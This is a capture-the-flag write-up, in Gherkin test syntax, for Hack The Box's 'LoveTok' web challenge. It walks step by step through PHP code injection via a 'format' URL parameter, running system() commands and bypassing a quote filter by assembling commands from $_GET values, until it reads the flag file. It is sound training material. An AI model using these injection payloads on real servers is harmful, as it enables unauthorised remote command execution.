## Version 2.0
## language: en

Feature: love-tok-web-hackthebox
  Site:
    https://www.hackthebox.eu/
  Category:
    web
  User:
    rdanilu
  Goal:
    Find the flag

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Kali Linux      | 2020.4    |
    | Mozilla Firefox | 78.5.0    |

  Machine information:
    Given I am accessing the challenge site
    When reading the challenge information, it mentions
    """
    True love is tough, and even harder to find. Once the sun has set, the
    lights close and the bell has rung... you find yourself licking your wounds
    and contemplating human existence. You wish to have somebody important in
    your life to share the experiences that come with it, the good and the bad.
    This is why we made LoveTok, the brand new service that accurately predicts
    in the threshold of milliseconds when love will come knockin' (at your door
    ). Come and check it out, but don't try to cheat love because love cheats
    back
    """
    Then I accessed to the website challenge [evidence](01.png)

  Scenario: Fail: Find the flag using the system function
    Given The entered in the challenge site
    When I analyzed the main page
    Then I noted that there was a button
    And I clicked on it
    And I saw that the time was restarted
    And the format parameter appeared [evidence](02.png)
    When I tried the following payload
    """
    ?format=${@print(phpinfo())}
    """
    Then I received the next output [evidence](03.png)
    And thus I checked that I could execute php functions
    Then I used the system function to execute the command below
    """
    ?format=${@print(system(pwd))}
    """
    And I received the next response [evidence](04.png)
    Then I inspected files in that directory with the following payload
    """
    ?format=${@print(system(ls))}
    """
    And I saw the next files and directories [evidence](05.png)
    Then I tried listing files in the root directory with the payload below
    """
    ?format=${@print(system(ls /))}
    """
    But it didn't work [evidence](06.png)
    Then I tried doing the same operation with the next payload
    """
    ?format=${@print(system('ls /'))}
    """
    But it didn't work due to the quotes were disabled
    Then I realized that I had to use a different approach to bypass the quotes

  Scenario: Success: Find the flag using $_GET variable to bypass the quotes
    Given that previously I couldn't execute all the commands correctly
    When I analyzed the $_GET superglobal variable [evidence](07.png)
    Then I saw that it had an array with the variables passed to the script
    And I realized that I could use that array to write the commands
    And in that way, I tried bypassing the quotes
    Then I utilized the payload below
    """
    ?0='ls /'&format=${@print(system($_GET[0]))}
    """
    But it didn't work
    Then I used the payload below together with the concatenation operator
    """
    ?0=ls&1= &2=/&format=${@print(system($_GET[0].$_GET[1].$_GET[2]))}
    """
    And thus I could visualize files in the root directory [evidence](08.png)
    Then I used the following payload to see the flag
    """
    0=cat&1= &2=/flagHEDN2&format=${@print(system($_GET[0].$_GET[1].$_GET[2]))}
    """
    And thus I found out the flag and solved the challenge [evidence](09.png)
